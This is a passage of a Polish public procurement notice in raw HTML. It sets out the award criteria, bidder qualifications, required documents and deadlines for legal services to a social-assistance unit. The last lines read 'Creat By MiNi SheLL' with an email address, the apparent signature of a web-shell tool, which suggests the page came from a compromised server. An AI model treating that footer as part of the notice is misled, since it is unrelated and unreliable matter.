nieprzewidzianych okoliczności losowych wśród klientów OIK, dla których Zleceniobiorca będzie świadczył usługę, Zleceniodawca w porozumieniu z Zleceniobiorcą, dostosuje wówczas wykonanie przedmiotu umowy w taki sposób,<br/>aby był zgodny z ustawą z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (t. j. Dz. U. z 2024 r., poz. 1411). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79111000-5 - Usługi w zakresie doradztwa prawnego</p> <p class="mb-0">79112000-2 - Usługi reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolność techniczna lub zawodowa <br/><br/>Dla części I i II<br/>1). w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał a w przypadku świadczeń okresowych lub ciągłych wykonuje, w sposób należyty, co najmniej 1 usługę polegającą na obsłudze prawnej jednostki pomocy społecznej przez okres co najmniej 12 miesięcy.<br/>Jeżeli Wykonawca wykaże usługę wykonywaną (w trakcie realizacji), to okres wykonanej (zrealizowanej) usługi na dzień składania ofert musi wynosić co najmniej 12 miesięcy.<br/>Jeżeli Wykonawca wykaże usługę wykonaną (zakończoną) to okres wykonywania usługi co najmniej 12 miesięcy musi przypadać w okresie ostatnich trzech lat przed upływem terminu składania ofert.<br/>Przez jedną usługę polegającą na obsłudze prawnej jednostki pomocy społecznej przez okres co najmniej 12 miesięcy należy rozumieć wykonanie lub wykonywanie obsługi prawnej w sposób nieprzerwany (ciągły) przez okres 12 miesięcy na rzecz tego samego podmiotu w ramach jednej lub większej ilości umów.<br/>Dla części I i II<br/>2). dysponuje lub będzie dysponował osobą posiadającą uprawnienia do wykonywania zawodu adwokata lub radcy prawnego, zgodnie z ustawą z dnia 26 maja 1982 r Prawo o adwokaturze (t. jedn. Dz. U. z 2024 r., poz. 1564 z późn. zm.) lub ustawą z dnia 6 lipca 1982 o radcach prawnych (t. jedn. Dz. U. z 2024 r., poz. 499 z późn. zm), lub prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej (t. jedn. Dz. U. z 2020 r., poz.823). Wykazane osoby muszą być wpisane na listę uprawnionych do wykonywania zawodu radcy prawnego/adwokata prowadzoną przez właściwy organ danej korporacji zawodowej, tj. Radę Okręgowej Izby Radców Prawnych/Okręgową Radę Adwokacką. Osoba ta musi legitymować się co najmniej 24 miesięcznym doświadczeniem zawodowym w charakterze radcy prawnego lub adwokata, w tym 12 miesięcy w zakresie obsługi prawnej jednostki pomocy społecznej.<br/><br/>Doświadczenie zawodowe należy podać od daty wpisu na listę uprawnionych do wykonywania zawodu radcy prawnego/adwokata prowadzoną przez właściwy organ danej korporacji zawodowej. Przez doświadczenie rozumie się lata czynne zawodowo w wykonywaniu odpowiednio zawodu radcy prawnego lub adwokata.<br/>Jeżeli wskazana osoba wykonywała usługę w tym samym czasie na rzecz różnych podmiotów to doświadczenie w takim przypadku nie będzie się sumowało (nie będzie się sumowało doświadczenia nabytego u różnych podmiotów w tym samym czasie).<br/><br/><br/>Uwaga : W przypadku Wykonawców wspólnie ubiegających się o zamówienie, warunki może spełnić jeden, kilku lub łącznie wszyscy Wykonawcy ubiegający się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj.: Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie ze wzorem określonym w załączniku nr 3 do SWZ. <br/>2. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy– w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane- zgodnie z załącznikiem 8 do SWZ oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane , a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> b)	Formularz ofertowy– Załącznik nr 1 do SWZ; <br/>c)	Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (jeśli dotyczy) – załącznik nr 5 do SWZ<br/>Wymagana forma:<br/>Zobowiązanie musi być złożone w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym przez osoby upoważnione do reprezentowania podmiotu zgodnie z jego formą reprezentacji, na zdolnościach którego polega wykonawca, określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej tego podmiotu lub innym dokumencie<br/>d)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi/dostawy wykonają poszczególni wykonawcy – zgodnie z załącznikiem 7 do SWZ.<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w oryginale w postaci dokumentu elektronicznego <br/>podpisanego podpisem kwalifikowanym, zaufanym lub osobistym przez osoby<br/>upoważnione do reprezentowania wykonawców zgodnie z formą reprezentacji określoną <br/>w dokumencie rejestrowym właściwym dla formy organizacyjnej lub w innym <br/>dokumencie.<br/>e)	Pełnomocnictwo (jeśli dotyczy):<br/>1)	Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>2)	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy są zobowiązani do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców, należy załączyć do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź uchwały.<br/>2. Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo.<br/>3. Pełnomocnictwo sporządza się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust.<br/>1, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu, oraz brak podstaw wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące<br/>przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegający<br/>się o zamówienie publiczne.<br/>7. W przypadku Wykonawców wspólnie składających ofertę dokumenty w zakresie zdolności technicznej lub zawodowej<br/>składane przez konsorcjum lub spółkę cywilną zostaną ocenione pod kątem łącznego spełnienia wymagań Zamawiającego<br/>przez występujących wspólnie Wykonawców na podstawie złożonych dokumentów.<br/>8. Zgodnie z art. 117 ust. 4 ustawy pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w<br/>okolicznościach gdy Zamawiający określa warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy pzp. lub warunki dotyczące<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zobowiązani są do dołączenia do wniosku o dopuszczenie do<br/>udziału w postępowaniu albo do oferty oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy,<br/>zgodnie z załącznikiem nr 7 do SWZ.<br/>9. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>składających wspólną ofertę.<br/>10. W przypadku, gdy oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana,<br/>Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu zaakceptowanego przez strony i sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. Zamawiający poza możliwością zmiany na podstawie art. 455 PZP przewiduje również możliwość dokonania zmiany postanowień umowy zgodnie z jej zapisami. Szczegółowy opis zmian zawierają postanowienia umowy, stanowiącej załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-17 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com